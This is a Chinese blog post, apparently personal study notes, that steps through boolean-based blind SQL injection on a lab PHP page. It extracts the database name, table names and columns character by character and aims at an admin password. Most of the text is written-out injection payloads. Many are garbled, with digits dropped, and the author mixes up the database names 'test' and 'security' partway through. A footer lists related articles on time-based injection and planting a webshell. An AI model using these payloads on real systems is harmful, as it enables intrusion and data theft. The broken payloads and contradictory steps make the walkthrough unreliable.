盲注 那么我们来了解一点盲注的语法

这里面是语法的介绍

https://blog.csdn.net/alex_seo/article/details/82148955

0X01第一步我们先判断当前数据库的长度

语法构造

/index.php?id=%20and%20length((select%20database()))%3E3 正确
index.php?id= and length((select database()))>4 错误

那我们确定数据库名字大于3不大于4 那么数据库长度就是4了

0X02爆数据库名称

http://www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E1 正确
?id= and ascii(substr((select database()),,))>100 真确
id= and ascii(substr((select database()),,))>115正确




?id=1 and ascii(substr((select database()),1,1))>116 错误






那我们得到数据库的第一个位置的数据的ascii是116 =>t


继续爆第二个




?id= and ascii(substr((select database()),,))>100 正确






?id= and ascii(substr((select database()),,))>101 错误 




那么第二个字母是 101=>e


继续爆第三个




?id= and ascii(substr((select database()),,))>114 正确  

?id= and ascii(substr((select database()),,))>115 错误




第三个字母 115=> s


第四个




?id= and ascii(substr((select database()),,))> 真确  

?id= and ascii(substr((select database()),,))>116 错误




第四个 => 116 t


那么我们的数据库的名称应该是test


0X02爆表名


先判断有多少个表


1' and (select count(*) from information_schema.tables where table_schem=database())>5#


这里我不知道语法


然后第一个表的长度








id= and length((select table_name from information_schema.tables where table_schema='test' limit ,))>




这里可以看见正确




id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 错误




那么第一个表长度为4


爆第一个表的表名的第一个字母




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>1 正确






?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确






?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>101 错误




那么这里我们知道表名的第一个之母是101=>e


第二个字母的爆破




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>108 正确


?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 错误




那么第二个字母 =>109  m


爆到这里不爆了 大概是email


我们开始爆破第二个表




?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确 
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 错误
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正确




第一个字母是114=>r


不是admin不想要


第三个表




id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>116 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 错误




第一个字母 117=> u


这个人肯定是users表 不多bb了盲注太烦了直接爆 列名


卧槽 库名是test 我要写成security 打错特错


0X03爆列名


操作和爆破表名的操作是一样的


这里我们爆破出来是 username 和password


0X04爆字段


password




ascii(substr((select password from admin limit ,),,))>




查内容 我们在查我们的密码 在admin表里面的password列里面
												


											
大哥带我们的mysql注入 基于bool的盲注的更多相关文章
	

    
								
  1. 大哥带我们的mysql注入 基于时间的盲注
		
    ?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and =  ...
    
		
    2. 
						
  2. 大哥带我们的mysql注入
		
    这是今天的任务 任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell,  都是 ...
    
		
    3. 
						
  3. mysql order by基于时间的盲注
		
    order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就 ...
    
		
    4. 
						
  4. mysql基于“时间”的盲注
		
    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...
    
		
    5. 
						
  5. 深入浅出带你玩转sqlilabs(五)-布尔/延时盲注与二次注入
		
    SQL测试-基于布尔,延时盲注 布尔,延时注入常用到的判断语句 regexp regexp '^xiaodi[a-z]' 匹配xiaodi及xiaodi...等 if if(条件,5,0) 条件成立  ...
    
		
    6. 
						
  6. SQL基于时间的盲注过程
		
    0x00 前言 由于要使用到基于时间的盲注,但是我觉得基于时间的盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了: 首先我觉得基于时间的盲注和基于布尔的盲注的最直观的差别就是 ...
    
		
    7. 
						
  7. DVWA-基于布尔值的盲注与基于时间的盲注学习笔记
		
    DVWA-基于布尔值的盲注与基于时间的盲注学习笔记 基于布尔值的盲注 一.DVWA分析 将DVWA的级别设置为low 1.分析源码,可以看到对参数没有做任何过滤,但对sql语句查询的返回的结果做了改变 ...
    
		
    8. 
						
  8. Python:SQLMap源码精读—基于时间的盲注(time-based blind)
		
    建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...
    
		
    9. 
						
  9. Python:SQLMap源码精读—基于错误的盲注(error-based blind)
		
    目标网址 http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 Payload的生成 <test> <title>MyS ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. (转)HashMap底层实现原理
			
    ①HashMap的工作原理 HashMap基于hashing原理,我们通过put()和get()方法储存和获取对象.当我们将键值对传递给put()方法时,它调用键对象的hashCode()方法来计算h ...
    
			
    2. 
						
  2. day16 常用模块 sys os json pickle
			
          知识点 os:和操作系统相关sys:和解释器相关 json:和操作JSON(一种数据交换格式)相关pickle:序列化 hashlib:加密算法Collections:集合类型       ...
    
			
    3. 
						
  3. 国内高速下载Docker
			
    一般情况下,我们可以从Docker官网下载docker安装文件,但是官方网站由于众所周知的原因,不是访问慢,就是下载慢.下载docker安装包动不动就要个把小时,真是极大的影响工作效率. 在这里推荐一 ...
    
			
    4. 
						
  4. N4复习考试总结
			
    一つ(ひとつ) 半分(はんぶん) 煙草(たばこ)を吸う(すう) 玄関(げんかん) ナイフ(刀)     財布(さいふ) 浅い(あさい) 薄い(うすい) 牛乳(ぎゅうにゅう) 皿(さら) 七日(なのか) ...
    
			
    5. 
						
  5. 利用python自动发邮件
			
    工作中有时长时间运行代码时需要监控进度,或者需要定期发送固定格式邮件时,可以使用下面定义的邮件函数. 该函数调用了outlook和qqmail的接口,只需要放置到python的环境目录中即可 impo ...
    
			
    6. 
						
  6. SQLServer Transaction Isolation Level
			
    基本用法 -- Syntax for SQL Server and Azure SQL Database SET TRANSACTION ISOLATION LEVEL { READ UNCOMMIT ...
    
			
    7. 
						
  7. git每次更新都需要输入账号密码,如何解决?
			
    //如果https请求pull每次都需要输入账号密码,则 git config --global credential.helper store   那么,在下一次更新,需要输入账号密码,然后git就 ...
    
			
    8. 
						
  8. docker python3环境搭建
			
    1.使用镜像为daocloud的python镜像 docker run -it --rm --name my-running-script -v "$PWD":/usr/src/m ...
    
			
    9. 
						
  9. java常用类与包装类--包装类
			
    2.基本数据类型数据的包装类 局部变量中基本数据类型直接分配在栈中,而对象分配在堆中 将基本数据类型封装成对象的好处在于可以在对象中定义更多的功能方法来操作该数据 包装类主要功能:用于基本数据类型与字 ...
    
			
    10. 
						
  10. 一些项目中用到的php函数
			
    #不为空 if (!empty($_POST)) { } #生成随机数 mt_rand(,)产生999-9999范围间的随机数
    
			
    11.